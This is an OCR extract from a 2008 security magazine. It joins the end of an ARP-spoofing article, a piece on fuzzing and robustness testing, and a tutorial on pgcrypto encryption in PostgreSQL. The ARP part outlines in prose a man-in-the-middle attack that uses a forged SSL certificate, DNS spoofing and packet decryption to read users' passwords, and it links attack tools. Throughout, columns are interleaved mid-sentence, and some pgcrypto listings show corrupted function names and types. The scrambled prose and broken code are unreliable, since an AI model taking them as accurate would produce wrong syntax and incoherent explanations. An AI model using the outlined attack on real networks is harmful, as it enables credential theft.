ARP Inspection. These (Secure Version), Banks, Online Stores, defence against ARP spoofing is often work by ensuring that if the ARP packets do etc. It is beyond the scope of this article, impractical (i.e. on a neighbours home not match the entries specified the DHCP but the basics behind it include issuing network, or a wireless Hotspot), and as such Snooper, then the ARP packets are simply your own SSL Certificate instead of having isn’t used. However, there are methods of dropped. This sort of ARP security makes it the company's SSL certificate issued, all defence which are often implemented on impossible to ARP poison, as these smart the while spoofing the DNS requests, and larger scale business networks. The only switches ensure that only the legitimate capturing all packets with wireshark. These true method of defending against ARP packets make it through the network. are then decrypted with SSLDump into a spoofing is by using completely static non- On a smaller scale, Arpwatch or human reable form, where any passwords changing ARP entries with non-changing AutoScan are two good programs for can be read by you. Obviously, this can have MAC’s and IP’s, but the sheer scale of the keeping an eye on the network for any hugely devastating effects to your average job of keeping the ARP entries up to date changes, and are quite practical for your user who does not examine certificates. is enough to put most network admins average home network (managed by Another possibility is re-directing all traffic off this method, so other methods are a somewhat knowledgeable person). to a certain website. This can obviously be available. Once such method would be to Defence is the hardest part, so your best used for fun – but what if someone used use strong wireless encryption techniques, bet is to not allow any unauthorized or untrusted people on your network, and if you do, be prepared and watchful for such On the 'Net attacks, and always view certificates to • http://www.remote-exploit.org/ – BackTrack available here pages to verify them. • http://www.aircrack-ng.org/ – AircrackNG and suite available here Stephen Argent • http://www.alobbs.com/macchanger/ – MAC Address changing program Stephen Argent is currently in Australia completing his • http://ettercap.sourceforge.net/ – EttercapNG studies, and hopes to proceed onto further advanced • http://en.wikipedia.org/wiki/Address_Resolution_Protocol/ – ARP on Wikipedia education programs afterwards. Stephen has taught himself a diverse range of computing skills, working for • http://en.wikipedia.org/wiki/Man_in_the_middle – MiTM on Wikipedia himself in many areas of computing for the past 8 years, • http://autoscan.fr/ – AutoScan Program (IDS) ranging from password and data recovery, to Wireless • http://www-nrg.ee.lbl.gov/ – Arpwatch is available here cracking, amongst various other things, under both the Windows and Linux environments.54 HAKIN9 4/2008DEFENSEMIKKO VARPIOLA, ARI TAKANEN How to Deploy Robustness Testing Difficulty Today’s software companies design and test their code using the well-accepted, familiar method of positive testing. Still, all communications software appears to be infested with security- critical bugs that can be misused to crash the software or to take total control of the device running the software. ore than 80 percent of all attack percent test coverage does not typically account tools exploit these types of simple for the complex tests required to catch unexpected M implementation mistakes. And error situations. That is where robustness or negative everything fails when tested for these types of testing comes into play. flaws. In this article, we will explore various means of testing for such security mistakes, with a focus Negative Testing Through on deploying robustness testing into the software Randomness or Protocol Models development lifecycle. Negative testing, or fuzzing, extrapolates the complex interactions far beyond regular feature Positive Testing for Conformance testing. The main objective of the negative testing Positive testing encompasses all testing methods is to identify the most critical problems approaches that aim to validate features so that programmers can improve software against requirements documentation. A simple quality, reducing public exposure to crash-level WHAT YOU WILL requirement could say, for example, Software software defects. The challenge in negative testing LEARN... must prompt for username and password before is that for each positive requirement, there is an How robustness/negative granting access to the data. At a later point in the infinite number of negative test cases that need to testing fills the critical gap left by positive testing – and reduces software development lifecycle, a test designer will be tried (Figure 1). Random testing is one method the cost and time required for read the requirement and implement a number of of validation, but it has very little chance of testing test cases to validate the feature. In the example, discovering security-related flaws. Negative testing Results of comparing positive the designer would likely try, at minimum, to input can accomplish this goal effectively through vs. negative testing and random fuzz testing vs. model-based the correct username and password. systematic grammar-based test generation. negative testing While positive testing is prevalent in the software A random test for the example given earlier How to analyze test coverage in design cycle, it does have drawbacks. Programmers would aim to generate a predefined number a way that specifies which flaws were exposed usually receive a rough guideline of vague, of tests or an undefined number of tests in incomplete specifications. The same incomplete a predefined time, using pairs of random WHAT YOU SHOULD requirements make it difficult for test designers to usernames and passwords. The entire test run KNOW... consider the infinite number of permutations of test for the validation would probably consist of two Basic principles of fuzz testing, AQ and the difference between cases required to validate each feature. As most test groups, each containing a huge number of model-based testing versus test design in positive testing is conducted through individual test cases. For any effective testing, random fuzz testing manual work, reaching any good test case coverage at least part of the protocol needs to be valid, Fundamental concepts of will take an enormous amount of time, delaying and therefore the first test suite would keep negative testing versus positive testing the product launch. Furthermore, the claim of 100 the username valid and randomly corrupt the 56 HAKIN9 4/2008 A GUIDE ON THE POSITIVES OF NEGATIVE TESTING password, and then in the next test suite knowledge integrated into the used tool. The we saw that negative testing can reach the username would be corrupted. challenge in model-based testing is that code that will not be touched by positive In model-based or grammar-based building a good model often takes a lot of tests alone. An example of such code negative testing, both username and protocol and vulnerability knowledge. would be error handling routines and password are enumerated through a One method of measuring the test other exception handlers. Table 1 shows predefined set of anomalies in an anomaly efficiency of negative testing is to use code results of running a mode-based fuzzer library. Based on past vulnerability knowledge, coverage tools. This can be done with open and a conformance test suite against the anomaly library is highly optimized to source tools such as gcov, which requires OpenSSL implementation. Although catch different types of problems in code. access to the source code for instrumenting these results are from a Master’s Thesis Example tests could include commonly the code with coverage hooks. Runtime study by Tero Rontti in 2004. Even back used passwords, long strings, format string coverage tools such as PaiMei will analyze then, they did a revealing discovery on problems, boundary value conditions and the binary while it is being executed and how negative testing will explore more so on. A model-based suite of negative report the coverage based on the instruction code compared to positive testing alone. tests can consist of tens of thousands of pointer as it walks through the executable The coverage was mostly overlapping, carefully thought-out test cases. From a test code. although some of the code was touched documentation perspective, it is typically only by one or the other testing technique considered one test suite, or a test, and the Comparisons (Table 1). pass/fail criteria for the test are given for each Through Code Coverage A comparison of random testing test run. For example, a bad test document In our studies related to code coverage versus model-based fuzzing is even can say that all external interfaces need to between positive tests and negative tests, more revealing. A fuzzer product that be tested for security problems whereas a good test documentation will define the interfaces and interface specifications that need to be covered in the test. Still, each failed test run against a specific interface �� and its specification can uncover a large �� number of faults mapping down to a set of flaws in the product (Figure 2). Both negative testing approaches have their pros and cons. A random fuzz test is extremely easy to implement and run. The simplest method for random fuzzing is to send random garbage to each open network interface. A slightly better method of conducting random testing �� is to take a template use case, a positive �� test case, and start semi-randomly mutating �� it. Random testing is the minimum amount of negative testing that designers should do for every open interface and network protocol. It will usually crash the software Figure 1. Infinity of negative inputs, and test optimization (source: Fuzzing for Software – The shortcoming is that the test coverage Security by Takanen et al., by Artech House, in press) is almost impossible to estimate. Metrics for Fuzzing Test coverage is the first question a quality assurance expert will want to know when negative testing is described to him. What was tested and what was untested? Did we find all flaws, or just five percent of the flaws? This can be challenging for random testing, but also for template based fuzz tests. Model-based fuzzing will answer these questions a bit better, although it still cannot guarantee that all flaws were found. The quality of model-based fuzzing is based on Figure 2. The results of a test run with one single input causing a failure (crash) among the quality of the model, and the vulnerability hundreds of other tests (Source: Codenomicon HTTP Test Suite)4/2008 HAKIN9 57 DEFENSE A GUIDE ON THE POSITIVES OF NEGATIVE TESTING reaches the highest coverage result and layers of protocols on each of network-enabled service, testers need to is not necessarily the best at finding those identified interfaces. The most fuzz all layers. For example, for testing a security-critical flaws in the product. common use case for fuzzing is in Web VoIP service, they need to test IPv4, TLS, A good model can reach high code development. Several commercial tools SIP, RTP, and the actual application logic coverage even without a good anomaly from companies such as Cenzic, HP and including various voice encoding formats library. This indicates that code coverage IBM are available for testing various Web (Figure 3). is very bad at measuring the goodness applications, some of which are quite of negative testing. On the other hand, a intelligent in their approach to negative Input Space Coverage random fuzzer will typically reach very low testing. However, for any communication The most challenging metric is related code coverage, indicating that it will not device or network service, designers need to measuring the actual inputs given to test anything but the simplest structures to take a step back and see what other any of the above-mentioned interfaces. in the inputs. A presentation by Charlie communication is happening. Almost any For any meaningful metrics the interface Miller at CanSecWest revealed that the enterprise environment today depends needs to have a formal description, which code coverage for intelligent model- on communication technologies such as can also be deduced from sampled of based fuzzers could be more than two HTTP and SSL/TLS (for Web services), SIP network packets. For example, for a simple times higher than for the less intelligent and RTP (for VoIP), ISAKMP, IKE and IPSEC protocol such as TFTP, the interface fuzzers. (for VPN connectivity), and SMTP, POP and description can be something like this IMAP (for e-mail). Protocols like these are (using BNF-like description, simplified for Coverage Through Interfaces familiar to any security engineer that has brevity): and Attack Vectors configured a firewall for enterprise use Test coverage can also be analyzed and creating threat scenarios should be <RRQ> ::= (0x00 0x01) through the various attack vectors simply based on that knowledge. For any <FILE-NAME> <MODE> Table 1. Code Coverage for OpenSSL (Source: Tero Rontti, <WRQ> ::= (0x00 0x02) Robustness Testing Code Coverage Analysis, Master’s Thesis, 2004) <FILE-NAME> <MODE> <MODE> ::= ("octet" | "netascii") 0x00 Metric/Test Suite Model-based Fuzzer Conformance Suite <FILE-NAME> ::= { <CHARACTER> } 0x00 Line Coverage 20.1% 19.7% <CHARACTER> ::= 0x01 -0x7f Branch Coverage 5.1% 4.2% Measuring the input space would be based Function Coverage 17.4% 16.2% on analyzing each of the inputs used for all �� �� �� �� Figure 3. Example protocol stack from VoIP, showing various layers and interfaces that need to be tested (source: Securing VoIP Networks by Thermos and Takanen, Addison-Wesley 2007)58 HAKIN9 4/2008 4/2008 HAKIN9 59 DEFENSE A GUIDE ON THE POSITIVES OF NEGATIVE TESTING elements inside the protocol messages. For Example Test Results or the security expert conducting a example, trying only 10 inputs for a file name Last year, we at Codenomicon collected penetration test against the system has would result in a smaller input coverage some research findings from testing to understand the inner operations of the than using 100 inputs. The problem with various wireless devices and compiled product. Integration to system monitoring automated input space coverage is in a white paper on that topic using our tools and test controllers is crucial for a analyzing how meaningful each of those commercial model-based fuzzers. The successful test. inputs really were. study, for example, revealed that fuzzing Where do we see the usage of fuzzing was able to break down 28 out of 31 today and tomorrow? IT decision makers The Ultimate Bluetooth devices we tested. Figure 4 at software companies should deploy Goal – Finding a Flaw shows similar experiences from testing negative testing because of the direct Fuzzing is not only about generation of test wireless access points. Everything broke cost benefits and advantages associated cases. It is also about detecting and fixing when fuzzing was deployed to WiFi devices with it. A flaw identified proactively before the found issues. A security guy might be (Figure 4). The resulting error modes deployment has enormous value to happy with one new zero-day mistake in ranged from crashing processes and them. Identifying specific protocol and the product and might not worry about the services, to total reboot of the device, permutations of inputs, software testers time it takes to actually fix the found flaws. or even corruption of the internal flash are able to determine difficult issues using The software developers, however, only memory in the embedded device requiring this model-based optimized method. care about the easiness of fixing the found reprogramming of the device to fix it. Additionally, they do not waste time trying issues. A problem that cannot be easily Clearly, the industry is not yet deploying to explore the infinite amount of inputs to reproduced will not get a high priority in the negative testing in all different software determine the particular test that causes long bug lists that they are working on. industries. anomalous behavior. Negative testing The debugging phase starts when solves this issue by allowing them to apply testers do find a crash-level flaw. Conclusion their previous experience with typical Preparation for that outcome has to The main problem for fuzzing today is problem areas to target specific test start immediately when planning tests. that too few people do it. For those who cases, giving them more time to work on All commercial tools have various test already use fuzzing, the greatest challenge other higher-priority tasks. Negative testing control APIs that testers can use to appears to be metrics. If you cannot also has benefits for the customer: code restart the test target and to collect measure it, you cannot improve it, and you has fewer defects, so there is less public various metrics from the tests and the surely do not understand it. All types of exposure to attacks and that makes target system. Network analyzers can metrics are critical for the deployment of for a better experience for the software be used to collect all network traffic and useful fuzzing techniques. end user. There are no false positives enable reproduction of the tests through The most important part of deploying in fuzzing. Negative testing is just one capture-replay tools, if such functionality negative testing is to conduct a good piece of the puzzle of security testing is not included in the test tool itself. For interface analysis and to understand techniques, and fuzzing is just one form of debugging the actual flaw, it is important what you need to fuzz. Through that negative testing. But possibly it is the most to know the various flaw categories in analysis, you can map down the attack cost effective form of security testing, software. Catching the actual flaw from surface of the system under test. A depending how well you deploy it. the code can be very difficult if you do not limited fuzz test against one interface know what a buffer overflow looks like and or against one layer on that interface is how to fix it. Therefore, it is beneficial to do not enough to verify the security of the Mikko Varpiola Mikko Varpiola is a Codenomicon founder and training on secure programming skills for system. A fuzzer tool alone is not enough security/robustness solutions architect. Before founding the entire development team. for the security test. The test engineer the company, he was a key researcher at a globally recognized security testing research group, Oulu University Secure Programming Group (OUSPG). Mikko is the company’s leading expert on hacking communication interfaces, and speaks more than 160 protocols fluently. He has been involved with the development of fuzzers for all those protocols and in using those tools to conduct the best security assessments in the world as part of Codenomicon’s services offering.Ari Takanen Ari Takanen is a founder and CTO of Codenomicon Ltd., an accomplished speaker and published author on the topic of software security testing. In addition, Ari has an extensive background in the academic world through his software security testing research at PROTOS/OUSPG. During his research he developed his passion for identifying and eliminating the coding errors and software weaknesses that threaten businesses and individuals Figure 4. Test results from testing various WiFi Access Points (source Codenomicon white alike. He has also written two books on how to identify paper 2008) security weaknesses.58 HAKIN9 4/2008 4/2008 HAKIN9 59 DEFENSE ROBERT BERNIER Protecting Data in a Postgres Database DifficultyWhat if the cracker has the ultimate power to see and do things they are not authorized to possess? What if they acquire the privileges of the superuser himself? t is assumed that the database administrator CONFIGURE = '--with-perl' '--with-python' is among the most trusted members of your '--with-tcl' '--with-openssl' '--enable- I team. However, there are situations that even thread-safety' he should not need access to certain data that he is managing. Why saddle extra responsibility on If it is not there then you will not be able to the DBA when it is simply not necessary? work with the pgcrypto module. You will have This final article in my series of PostgreSQL to configure the MAKE files i.e. compose the authentication and security addresses the issue command ./configure --with-openssl in the of restricting access to data via the use of data source tree and recompile the source code. encryption. We are going to look at the cool Note: pgcrypto also requires the zlib so as things you can do using cryptographic functions to be able to compress the encrypted data in a obtained from two contributions modules in table. Postgres i.e. chkpass and pgcrypto. You should have the following four files before The Md5 Function proceeding: The MD5, or message digest, is a Postgres native function that generates a unique 128-bit (32 • chkpass.so character) hash value that is used to represent WHAT YOU WILL • text or binary input that could of any size. Using LEARN... chkpass.sql • pgcrypto.so the function allows you to compare and test the Restricting access on the local • data integrity very quickly. host using Unix domain sockets pgcrypto.sql Because the hash is one-way i.e. it cannot Running encrypted sessions Detailed information in the form of README text be decrypted, comparisons require that the data Client/server connections using SSL file should also be available: README.chkpass input must be hashed too. See an example in Using authenticated sessions and README.pgcrypto Listing 1. You will have to install the appropriate This is third (and the last) part of the Postgres Series. WHAT YOU SHOULD package for your particular distribution of OS if the KNOW... So far we have explored two techniques that prevent above files are not present. crackers from sniffing vital information, during a SQL92, SQL99, SQL2003 If you have installed the Postgres binaries, database session over the network, using SSL protocols by compiling its source code, then run the utility based tunnels. We have also reviewed a number of Postgres command line console, authentication technologies designed to prevent the psql pg _ config and look for something similar to the following line of output. It needs to have the switch cracker from logging from unsanctioned locations using Configuring and compiling legitimate user accounts and passwords. Postgres from source code --with-openssl:60 HAKIN9 4/2008 PROTECTING DATA IN A POSTGRES DATABASEAs was explained earlier in this article, The Pgcrypto Contrib Module data. A thorough understanding of the md5 function is used by Postgres itself The pgcrypto contributions module is a these functions and the theory behind to hash user account passwords which collection of functions permitting the DBA them empowers the Postgres DBA with are subsequently stored in the table to create and administrate a database the ability of protecting his data that is pg _ shadow (pg _ authid). Using md5 as system capable of handling encrypted comparable to any relational database a means to hash sensitive passwords is not ideal because the same password is Listing 1. Demonstrating the MD5 hash function represented by the same hash. Postgres generates unique password hashes postgres=# create temp table t1(myhash text); by appending the user name before its CREATE TABLE hashed (this implies that you can not have postgres=# insert into t1 values(md5('this is my first test statement')); more than one user account with the same INSERT 0 1 name in the data cluster). postgres=# insert into t1 values(md5('this is my second test statement')); This process is known as adding a INSERT 0 1 salt. Unfortunately, this salt is rather easy postgres=# select myhash as "hashed message" from t1 where myhash=md5('this is my to figure out for a cracker interested in second test statement'); hacking the password. Therefore Postgres hashed message relies more on its inherent security model ------2fd2cebaf68bacde490cbaa8c4a6dcfe of privileges and rights to keep the hashed (1 row) password safe. Use passwords of at Listing 2. Installing the chkpass.sql script into the postgres database least 8 characters in length for adequate security. robert@laptop:~$ psql -f chkpass.sql postgres SET The Chkpass Contrib Module psql:/usr/local/pgsql/share/contrib/chkpass.sql:22: NOTICE: type "chkpass" is not yet The chkpass contributions module defined DETAIL: Creating a shell type definition. comprises of a set of functions, operators CREATE FUNCTION and a data type that results in the psql:/usr/local/pgsql/share/contrib/chkpass.sql:27: NOTICE: argument type chkpass is creation of an encrypted data type. For only a shell example, you can create a table that will CREATE FUNCTION store a password and upon insertion the CREATE TYPE password will be automatically encrypted. CREATE FUNCTION Testing the equality between the CREATE FUNCTION CREATE FUNCTION encrypted with the unencrypted form of CREATE OPERATOR the password is easily done by using the = CREATE OPERATOR COMMENT and <> and != operators respectively. The first step (Listing 2) involves installing Listing 3. Encrypting a column using the chkpass datatype ‘chkpass’ the chkpass scripts to the database. Listing 3 demonstrates an example usage. postgres=# create temp table t1(enc_passwd chkpass,id serial); The use of a salt in the chkpass NOTICE: CREATE TABLE will create implicit sequence "t1_id_seq" for serial column "t1.id" operator inserts a randomly generated CREATE TABLE set of bits that is also used as part of the postgres=# insert into t1 values('my password'); input along with the password as part of INSERT 0 1 the encryption. As you can see from the postgres=# insert into t1 values('my password'); INSERT 0 1 example the different encryptions created postgres=# insert into t1 values('my other password'); using the same password thereby making INSERT 0 1 it impossible to divine if two passwords are postgres=# select id,enc_passwd from t1 where enc_passwd='my password'; id | enc_passwd actually the same. ----+------An excellent application of the chkpass 1 | :gONNSqIoWsMiA operator is storing hashed information 2 | :QhbvWLZJEU21w such as credit-card numbers. The numbers (2 rows) are never stored, only their hash, but can postgres=# select id,enc_passwd from t1 where enc_passwd='my other password'; nevertheless be validated by comparing id | enc_passwd user requested input of the number to ----+------its stored hashed value. The hashed 3 | :eg8UP04YsRqAs (1 row) credit card number is what is termed as translucent data.4/2008 HAKIN9 61 DEFENSE management system using cryptography Installing the scripts into your working psql -f pgcrypto.sql postgres in the world today. database (postgres) is accomplished thusly: I will demonstrate pgcrypto's capabilities Table 1. The Pgcrypto Functions under several scenarios to give you an There are two classes of functions: General Encryption Functions and PGP-Like Encryption idea of the possibilities. Note, in order Functions (as per RFC 2440). The general encryption class of functions encapsulate the most to be brief, not all of the options and common functions used in a cryptographic environment and includes: symmetric-key encryption parameters for each function will be and decryption, hash functions, message digest algorithms, and random salt and byte generation. reviewed. I therefore urge you to read The pgp-like encryption class of functions deal specifically with encrypting and decrypting data the README.pgcrypto text file which using forms of both symmetric and asymmetric (public-key) encryption. you should consider as the definitive reference. Make sure GPG is installed on your host. You will need it to generate your keys. Installing it on a debian system, for Listing 4. Pgcrypto, general encryption functions example, is accomplished thusly: FUNCTION RESULT DATATYPE ARGUMENT DATATYPES apt-get install gnupg armor text bytea crypt text text, text dearmor bytea text For the purposes of this article, I am decrypt bytea bytea, bytea, assuming you are not an expert on text encryption (most people are not). decrypt_iv bytea bytea, bytea, Listing 4 presents General Encryption bytea, text digest bytea bytea, text Functions. digest bytea text, text encrypt bytea bytea, bytea, PGP-Like text encrypt_iv bytea bytea, bytea, Encryption Functions bytea, text These functions in Listing 5 have been gen_random_bytes bytea integer written as per OpenPGP (RFC2440) and gen_salt text text support both symmetric-key and public-key gen_salt text text, integer hmac bytea bytea, bytea, encryption. text hmac bytea text, text, text Example: Generate A Digest Listing 5. Pgcrypto, PGP-Like Encryption functions The digest function creates one way hashes. The supported algorithms are FUNCTION RESULT DATATYPE ARGUMENT md5 and sha1, although if Postgres has DATATYPES been configured and compiled using the pgp_key_id text bytea pgp_pub_decrypt text bytea, bytea --with-openssl switch then the supported pgp_pub_decrypt text bytea, bytea, hashes includes: md2, md4, md5, rmd160, text and . Listing 38 returns hex pgp_pub_decrypt text bytea, bytea, shat sha1 text, text and base 64 encodings. pgp_pub_decrypt_bytea bytea bytea, bytea pgp_pub_decrypt_bytea bytea bytea, bytea, Example: text Generating A Unique Password pgp_pub_decrypt_bytea bytea bytea, bytea, text, text The crypt and digest functions are pgp_pub_encrypt bytea text, bytea virtually the same but crypt includes a pgp_pub_encrypt bytea text, bytea, salt parameter ensuring a unique text text string is generated for the password. The pgp_pub_encrypt_bytea bytea bytea, bytea pgp_pub_encrypt_bytea bytea bytea, bytea, function gen _ salt is used to generate text the salt. pgp_sym_decrypt text bytea, text Notice the different results in Listing 7 pgp_sym_decrypt text bytea, text, text pgp_sym_decrypt_bytea bytea bytea, text between the two similar SQL statements: pp_gym_decrypt_byte byte byte, text, text pp_gym_encrypt byte text, text Example: pp_gym_encrypt byte text, text, text Generating Random Bytes pp_gym_encrypt_byte byte byte, text pp_gym_encrypt_byte byte byte, text, texts The function gen _ random _ bytes returns count cryptographically strong 62 HAKIN9 4/2008DEFENSEListing 6. Hex encoding of an MD5 hashed digest postgrs=# select encode(digest('hello world','md5'),'hex'); encode ------5eb63bbbe01eeed093cb22bb8f5acdc3 (1 row) postgres=# select encode(digest('hello world','md5'),'base64'); encode ------XrY7u+Ae7tCTyyK7j1rNww== (1 row)Listing 7. Generating a unique password postgres=# select pwhash as "hashed password", crypt('mypassword',pwhash) as "authenticated password" from (select crypt('mypassword',gen_salt('md5')))t1 (pwhash); hashed password | authenticated password ------+------$1$J2RPtadk$WpXqQUK8SJqGb9wQDmRnB0 | $1$J2RPtadk$WpXqQUK8SJqGb9wQDmRnB0 (1 row) postgres=# select pwhash as "hashed password", crypt('mypassword',pwhash) as "authenticated password" from (select crypt('mypassword',gen_salt('md5')))t1 (pwhash); hashed password | authenticated password ------+------$1$Lw44YyWo$S0Tj8s0YlUnZBSnx/s0DF1 | $1$Lw44YyWo$S0Tj8s0YlUnZBSnx/s0DF1 (1 row)Listing 8. Generating Random Bytes postgres=# select hmac('my message, hello world'::text,'my secret key','rmd160') as hmac_hash; hmac_hash ------Y\242T?\227\250\351\212\315\316l\323\242F\207,\273&{\251-- To make things a little easier, try encoding the bytea string: postgres=# select encode(hmac('my message, hello world'::text,'my secret key','rmd160'),'base64') as hmac_hash; hmac_hash ------WaJUP5eo6YrNzmzTokaHLLsme6k= (1 row)Listing 9. Encrypting a secret message postgres=# select encrypt('my secret message', 'my password', 'bf') as encrypted_msg; encrypted_msg ------\026V|h\312!\034\2076\367'.\352%/\371\200K\331i>\357t, (1 row)Listing 10. Decnrypting a secret message postgres=# select decrypt(encrypted_msg,'my password','bf') as decrypted_msg from (select encrypt('my secret message', 'my password', 'bf')as encrypted_msg)t1; decrypted_msg ------my secret message (1 row)64 HAKIN9 4/2008 random bytes. This function exists so the database, postgres, which then returns as to avoid draining the randomness 1024 randomly generated bytes using an generator pool from the operating encoding of base64: system.This example command is executed psql -t -c "select encode(gen_random_ from a shell. It accesses the function in bytes(1024),'base64');" postgresListing 11. Simultaneous encryption and decyrption in one SQL statement postgres=# select decrypt(msg::bytea,'my password','aes') as "decrypted message" from (select encrypt('my secret message','my password','aes'))t1 (msg); decrypted message ------my secret message (1 row)Listing 12. Using Armor postgres=# select armor('this message is for export'); armor ------BEGIN PGP MESSAGE----- dGhpcyBtZXNzYWdlIGlzIGZvciBleHBvcnQ= =kbMg -----END PGP MESSAGE-----(1 row)Listing 13. Encrypting and decrypting data using the PGP-like functions gpg --gen-keyYou can get a list of the keys using the command: gpg --list-secret-keys robert@laptop:~$ gpg --list-secret-keys /home/robert/.gnupg/secring.gpg ------sec 1024D/7D64C6F4 2007-10-16 uid rob the tester (this is a test only) <robert.bernier5@sympatico. ca> ssb 2048g/5AA54096 2007-10-16-- The private and public keys are now exported as armored text files i.e. robert.asc.txt and robert.secret.asc.txt: robert@laptop:~$ gpg -a --export 5AA54096 > robert.asc.txt robert@laptop:~$ gpg -a --export-secret-keys 5AA54096 > robert.secret.asc.txtListing 14. Symmetrical key encryption and decyrption postgres=# select pgp_sym_decrypt(msg,'my password') as "decrypted message" from (select pgp_sym_encrypt('my secret message','my password'))t1 (msg); decrypted message ------my secret message (1 row)Listing 15. Asymmetrical key encryption and decyrption postgres=# \set public_key '''' `cat robert.asc.txt` '''' postgres=# \set private_key '''' `cat robert.secret.asc.txt` '''' postgres=# select pgp_pub_encrypt('my secret message',dearmor(:public_key)) as msg into temp table encrypted_message; SELECT64 HAKIN9 4/2008 DEFENSEExample: the password my password using the blow They are similar in usage to the encrypt Generating a keyed-Hash Message fish encryption algorithm, bf. and decrypt functions but have more Authentication Code (HMAC) This query, Listing 10, decrypts the power and are substantially more difficult HMACs are used to simultaneously verify above encrypted message, as executed in to crack. This example, Listing 14, query both the data integrity and the authenticity the subquery t1. encrypts and decrypts the data in the of a message. Consider the following Here is an invocation in Listing 11 that same SQL statement. scenario; you have one person who simultaneously encrypts and decrypts sends a message to another using an the data in one statement using the AES Asymmetrical, Public Key, intermediary messenger. It is important to encryption algorithm. Encryption-Decryption know that the messenger does not change The are two functions used for the contents of the message so included Example: Using Armor asymmetrical, public key encryption: with it is the message's authentication The armor function showin in Listing 12, pgp _ pub _ encrypt and pgp _ pub _ code (HMAC). The HMAC is generated is useful in the case of importing and decrypt. Unlike the previously discussed using both the message and a secret key exporting data, messages and keys into the symmetric key encryption, which uses one that only the sender and receiver possess. database. password to encrypt and decrypt data, The receiver can validate the authenticity asymmetric key encryption uses two keys: of the message by rerunning the delivered Example: Encrypting And one key, which is called the public key, to message and his secret key through Decrypting Data Using encrypt the data and a second key, called the HMAC function call and comparing The PGP-Like Functions the private key, which is used to decrypt the resultant hash with the one that was Author's Note The following examples the data. Everybody gets to see and use included along with the original message. covers only a small subset of the available the public key but the private key is kept The message is considered successfully functions. secret. authenticated if both hashes are the same. Using this family of functions requires a For the purposes of demonstration I The message authentication code can familiarity of GPG. I have used an optional am going to load my private and public use one of a number of algorithms i.e. the gpg password, my gpg password, to keys, that were generated by gpg, into same ones that are available for the digest decrypt the message in the function pgp _ session variables. The message will then function. Listing 8 is an example usage of pub _ decrypt. Execute the command be encrypted, using the pgp _ pub _ the HMAC function. shown in Listing 13. encrypt and dearmor functions, and saved into a session table. Decrypting the Example: Encrypt And Decrypt Data Symmetrical data is accomplished using the private Two encryption algorithms are supported in Key Encryption-Decryption key and the optional gpg password, the encrypt and decrypt functions: blowfish There are two types of functions for which I chose to create at the time of key (bf) and AES (aes). This SQL statement, symmetric (password) key encryption: generation. Listing 9, encrypts my secret message, with pgp_sym_encrypt and pgp_sym_decrypt. Here is the encrypting of my secret message, Listing 15, note the set of 4 single quotes which encloses the shell Listing 16. Returning an encrypted message using a SELECT query script command cat robert.asc.txt postgres=# \t which are in turn enclosed by back ticks Showing only tuples. that execute the command. postgres=# select msg from encrypted_message; This encrypted message, Listing 16, \301\301N\003 \353\303\335Z\245@\226\020\010\000\215M2Yic\215Kr\272\240\350\260C\\a\ is expressed as a data type bytea using 345\221\255+\...... escape encoding. Notice the meta- command which turns off the printing ...... \250L\252\376X\025:Y\203\000s\333Y>\306i\207\364SK\241EP\345+:\000\350\ \t of column names and result row count 033\326\350hH+(jd.^pJG\017\3232y\223 footers, etc (for the purposes of brevity I am -- And here is the decrypted message. Note that the formatting is turned on again by only going to show an abbreviated output repeating the command â€ś\tâ€ť: of the encrypted data). postgres=# \t Tuples only is off Encryption Caveats postgres=# select pgp_pub_decrypt((select msg from encrypted_message), dearmor(: Encryption performance issues: private_key), 'my gpg password') as "decrypted message"; decrypted message • Encryption affects database ------performance so do not encrypt all your data. my secret message (1 row) • Some of the encryption functions were intentionally crippled by the author of 66 HAKIN9 4/2008 4/2008 HAKIN9 67 DEFENSE PROTECTING DATA IN A POSTGRES DATABASE the module to operate slowly to defeat Symmetric technologies, such as OpenPGP, SSH, password cracking attempts. Key Encryption Issues SSL/TLS etc, use symmetric encryption • Encrypt only small pieces of data when Avoid generating keys/passwords in a with random full-length keys that are they are constantly accessed such as predictable, programmatic fashion, such exchanged using symmetric encryption credit card numbers, social security as pulling every third character from a with either pass-phrase or public-key numbers, etc. string value, or using the name of your pet encryption. For example, in the case of PGP, • Encrypt large pieces of data only when dog etc. Instead, use functions such as the random key is separate for every email are infrequently accessed. gen _ random _ bytes and gen _ salt to message. In the case of both SSH and • Beware of obfuscation techniques generate new passwords. SSL, the random keys are regenerated at that mimic encryption. Obfuscation Data and passwords that move regular intervals during a current session. techniques involves scrambling data between pgcrypto and client application They all incorporate various tactics to make using a very fast algorithm. Although are in clear-text therefore you must either it harder to break the encrypted data. it speeds up performance, it is restrict your connections to local, or use Perhaps you should consider nevertheless not as secure as pure SSL connections adopting the operating practices of encryption. One last word of counsel: consider OpenPGP, or something of a similar level • Encrypted data must be decrypted creating user-defined functions with an of complexity, rather than relying on just before it can used as a criteria in a untrusted procedural language to access simple ciphers for a system that requires query statement the openssl command line utility. You will a data encryption solution. Deciding to use • Use translucent data, data that has then have full access to the complete suite either a pass phrase or public-private key been hashed, if you simply want to of cryptography available on your machine. will depend on your usage and storage validate input, such as a credit card practices. A good approach would be to number, against its stored hash Disk Encryption adopt some form of public-private key Although not covered in this article, disk handling since it lets you cover more Public key encryption issues: encryption can be used effectively when scenarios. storing sensitive data on laptops i.e. In conclusion, using a cipher that does • Follow a policy of regularly changing mitigating lost or stolen data. Keep in mind not change in a database presents a passwords and encryption keys that performance degrades even if there is long term risk to the security of the data. • Assign multiple keys on your data with no encrypted data. Long lived encrypted data can become different expiry dates so as to avoid the target of brute force attacks. Your best locking yourself out of your data. Conclusion: Authentication option is to encrypt data for the short and • Never let old keys expire before And Encryption Techniques medium term and to re-encrypt your data installing new ones that you have One of the limitations you will see in many at regular intervals for the long term. encrypted with your data. data based encryption technologies is Never take the safety of your encrypted • Avoid storing private keys on the that most encryption concentrates on data for granted, especially for long term database. Instead, load the private key ciphers and not so much on public key storage! on the client side similar to the public- encryption. private key example. I suppose it could be argued that it • If you must store private keys on a is usual for databases to have weak/ Summary Remarks database then make sure that the keys simplistic/none encryption but that is not This purpose of this article was to themselves are encrypted with a pass as important as how an application should demonstrate what could be leveraged as weaknesses in Postgres either through phrase. handle its data. All the popular encryption ignorance or the nonchalance of one's duties. If nothing else, the final message that I would like to leave with you is this: no matter On the 'Net how good a piece of software is, there is alway a way of penetrating its defenses. In • Postgres: http://postgresql.org the end, it is the person and not the program • Postgres Documentation: http://www.postgresql.org/docs/8.2/static/ that makes the difference between success • Encryption: keywords that you can use to bring yourself up to speed at Wikipedia, http: and failure. //en.wikipedia.org: • Cryptography • Pretty Good Privacy Robert Bernier • Hash function Robert Bernier, robert@otg-nc.com, is a Business • HMAC (Hash Message Authentication Code) 